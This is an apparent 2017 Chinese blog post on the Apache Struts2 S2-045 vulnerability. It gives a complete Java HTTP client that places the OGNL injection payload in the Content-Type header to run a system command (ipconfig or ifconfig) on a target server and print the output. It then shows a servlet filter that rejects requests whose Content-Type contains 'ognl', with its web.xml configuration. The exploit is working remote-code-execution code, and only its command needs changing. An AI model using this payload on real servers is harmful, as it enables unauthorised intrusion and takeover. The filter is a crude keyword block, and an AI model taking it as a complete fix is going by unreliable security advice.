Struts2 s2-045漏洞检测 &临时解决方案

技术 作者:科技喵 2017-03-09 04:07:29
struts2 漏洞检测代码 (文件上传代码和 exce命令来均自网络 懒得自己写)
public static String upload(String url,String filePath){
String fdfsPath = "";
try {

DefaultHttpClient httpclient = new DefaultHttpClient();
HttpPost httppost = new HttpPost(url);
File file = new File(filePath);
String name = file.getName();
InputStream in = new FileInputStream(file);
MultipartEntity reqEntity = new MultipartEntity();
InputStreamBody inputStreamBody = new InputStreamBody(in,name);
StringBody fileNam = new StringBody(name);
StringBody dateFlag = new StringBody("20160122152301");
StringBody datumType = new StringBody("0");
StringBody uploadWay = new StringBody("0");
StringBody userId = new StringBody("0538");
StringBody tenderId = new StringBody("2315");
StringBody metrialsType = new StringBody("25");
StringBody ip = new StringBody("0.0.0.1");
StringBody driverName = new StringBody("huawei");
StringBody systemVersion = new StringBody("djf");
StringBody position = new StringBody("信息路38", Charset.forName("utf8"));
reqEntity.addPart("datums", inputStreamBody);
reqEntity.addPart("fileName", fileNam);
reqEntity.addPart("dateFlag", dateFlag);
reqEntity.addPart("datumType", datumType);
reqEntity.addPart("uploadWay", uploadWay);
reqEntity.addPart("userId", userId);
reqEntity.addPart("tenderId", tenderId);
reqEntity.addPart("metrialsType", metrialsType);
reqEntity.addPart("ip", ip);
reqEntity.addPart("driverName", driverName);
reqEntity.addPart("systemVersion", systemVersion);
reqEntity.addPart("position", position);
//linux
// httppost.addHeader("Content-Type", "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ifconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}");
//windows
httppost.addHeader("Content-Type", "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ipconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}");
httppost.addHeader("User-Agent","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36");
HttpResponse response = httpclient.execute(httppost);
int statusCode = response.getStatusLine().getStatusCode();

if(statusCode == HttpStatus.SC_OK){

System.out.println("服务器正常响应.....");

HttpEntity resEntity = response.getEntity();
System.out.println(EntityUtils.toString(resEntity));//httpclient自带的工具类读取返回数据

System.out.println(resEntity.getContent());

EntityUtils.consume(resEntity);
}else{
System.out.println(HttpStatus.getStatusText(statusCode));
}
} catch (Exception e) {
e.printStackTrace();
}
System.out.println("结束....");
return "";
}

public static void main(String args[]) throws IOException {
System.out.println("开始....");
upload("http://www.xxx.cn/website/index.do","E:\\www\\index.txt");
}

------------------------------------------------------------------------------------------------
临时解决办法
ForbiddenAccessFilter.java

public class ForbiddenAccessFilter extends OncePerRequestFilter {

protected void doFilterInternal(HttpServletRequest request, HttpServletResponse response,
FilterChain chain) throws ServletException, IOException {
String contentType=request.getContentType();
if(contentType!=null&&contentType.indexOf("ognl")!=-1){
System.out.println(contentType);
return;
}else{
chain.doFilter(request, response);
}
}

}
  web.xml 配置
<filter>
<filter-name>forbiddenAccessFilter</filter-name>
<filter-class>com.ahtec.webapp.filters.ForbiddenAccessFilter</filter-class>
</filter>
<filter-mapping>
<filter-name>forbiddenAccessFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
 

关注公众号:拾黑(shiheibook)了解更多

[广告]赞助链接:

四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

公众号 关注网络尖刀微信公众号
随时掌握互联网精彩
赞助链接